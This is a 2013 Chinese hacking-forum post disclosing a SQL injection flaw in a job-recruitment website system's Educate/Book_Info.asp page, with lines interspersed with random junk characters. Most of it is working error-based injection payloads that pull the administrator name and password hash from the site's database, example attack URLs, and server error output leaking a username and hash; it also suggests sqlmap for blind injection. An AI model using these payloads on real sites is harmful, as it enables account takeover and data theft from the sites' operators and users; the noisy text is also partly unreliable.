中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]

作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp . i2 V9 ~* Z0 W( V( Y

9 ?8 ~, @# ?2 I; G2 @此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
# X+ [  W2 ?  v % \" ~2 }8 E* e5 A) i
exp:如下
( g, C9 @8 X' f! Y4 s' e- e% p0 d查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)( J" y2 n* Q: L6 c1 p- ]
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" G" f0 ~! a3 F) Q3 k
: u) ^3 s" a8 c* V
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) ~. B/ W) ~8 z2 E ) c5 C. K5 C. u3 K
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'% s' t/ V8 v; Q. L+ m% |) C. W

) x- ]7 V- x- D% B# _' x7 {将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
" r# a. q- p% _) g# U% Y
( z( o( h$ H; Z. D" f% |/Educate/Book_Info.asp,行 85 b$ e6 s! Z* h0 {

& m2 N$ Y# h3 X2 ]2 n* F* ~http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)% x5 M6 n6 u' r) E9 G5 x3 _
/ X/ r) D1 F6 u% ~& q6 B6 I
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'5 ~% W) C0 ]) V- ^& _/ R

  }; k; w& [( z9 `$ y$ u将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。& `* T: [+ b5 L% H

) F( q  @% ]* ]/Educate/Book_Info.asp,行 8% G# G3 z# A; z' t+ C' ^6 x" c





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2